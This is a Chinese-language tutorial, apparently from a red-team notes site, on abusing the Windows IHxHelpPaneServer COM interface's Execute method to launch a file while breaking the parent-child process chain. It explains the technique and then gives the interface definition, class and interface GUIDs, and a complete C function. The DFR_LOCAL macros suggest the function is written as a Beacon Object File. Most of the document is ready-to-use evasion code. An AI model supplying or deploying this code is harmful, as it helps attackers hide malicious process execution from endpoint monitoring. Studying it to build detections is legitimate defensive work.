利用COM接口实现进程断链执行.md

实现原理

IHxHelpPaneServer是Windows的帮助和支持服务的一部分,它提供了一系列方法用于显示帮助内容、执行搜索等功能。关键点在于其中的Execute方法,这个方法原本设计用来启动与帮助文档相关的程序或脚本,但它也可以被利用来执行任意命令或程序

代码思路

1.定义COM接口

定义一个COM接口IHxHelpPaneServer,此接口包括一个Execute方法用于执行程序。DEFINE_GUID宏用于定义接口的ID,这是后续创建COM对象时需要的

struct IHxHelpPaneServer : public IUnknown {
    virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0;
    virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0;
    virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0;
    virtual HRESULT __stdcall Execute(const PWCHAR) = 0;
};

DEFINE_GUID(IID_IHxHelpPaneServer, 0x8cec592c, 0x07a1, 0x11d9, 0xB1, 0x5E, 0x00, 0x0D, 0x56, 0xBF, 0xE6, 0xEE);

2.创建IHxHelpPaneServer接口实例

首先使用CoInitializeEx函数初始化COM库

调用IIDFromString函数将字符串格式的GUID转换为GUID结构体,这个GUID结构用于描述COM对象的类型,也就是类ID

获取到类ID和接口ID后,使用CoCreateInstance函数创建IHxHelpPaneServer接口的实例

hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

IIDFromString(L"{8CEC58AE-07A1-11D9-B15E-000D56BFE6EE}", &ClassHxHelpPaneServerc);

HRESULT hr = CoCreateInstance(ClassHxHelpPaneServerc, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (void**)&IPaneServer);

3.执行程序

通过构造file://开头的路径字符串,调用IHxHelpPaneServer接口的Execute方法执行指定的文件

wchar_t FiletoExecute[MAX_PATH];
wcscpy(FiletoExecute, L"file://");
wcscat(FiletoExecute, path);

hr = IPaneServer->Execute((LPWSTR)FiletoExecute);

完整代码

struct
    IHxHelpPaneServer : public IUnknown {
    virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0;
    virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0;
    virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0;
    virtual HRESULT __stdcall Execute(const PWCHAR) = 0;
};

#define DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \
        EXTERN_C const IID name \
                = { l, w1, w2, { b1, b2,  b3,  b4,  b5,  b6,  b7,  b8 } }

DEFINE_GUID(IID_IHxHelpPaneServer, 0x8cec592c, 0x07a1, 0x11d9, 0xB1, 0x5E, 0x00, 0x0D, 0x56, 0xBF, 0xE6, 0xEE);

VOID HelpPaneServerDeChaining(wchar_t* path)
{
	DFR_LOCAL(OLE32, CoInitializeEx);
	DFR_LOCAL(OLE32, IIDFromString);
	DFR_LOCAL(OLE32, CoCreateInstance);
	DFR_LOCAL(MSVCRT, wcscpy);
	DFR_LOCAL(MSVCRT, wcscat);
	DFR_LOCAL(KERNEL32, GetLastError);
	DFR_LOCAL(OLE32, CoUninitialize);


	HRESULT hr_init;
	IHxHelpPaneServer* IPaneServer;
	GUID ClassHxHelpPaneServerc;

	hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

	IIDFromString(L"{8CEC58AE-07A1-11D9-B15E-000D56BFE6EE}", &ClassHxHelpPaneServerc);


	HRESULT hr = CoCreateInstance(ClassHxHelpPaneServerc, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (void**)&IPaneServer);
	if (SUCCEEDED(hr))
	{

		wchar_t FiletoExecute[MAX_PATH];
		wcscpy(FiletoExecute, L"file://");
		wcscat(FiletoExecute, path);

		hr = IPaneServer->Execute((LPWSTR)FiletoExecute);

		if (SUCCEEDED(hr))
		{
			print_msg("[+] Succeed Create Process.");
		}
		else {
			print_error("[-] Failed Create Process : 0x%02x", GetLastError());
		}

		IPaneServer->Release();

	}

	CoUninitialize();
}

最后更新于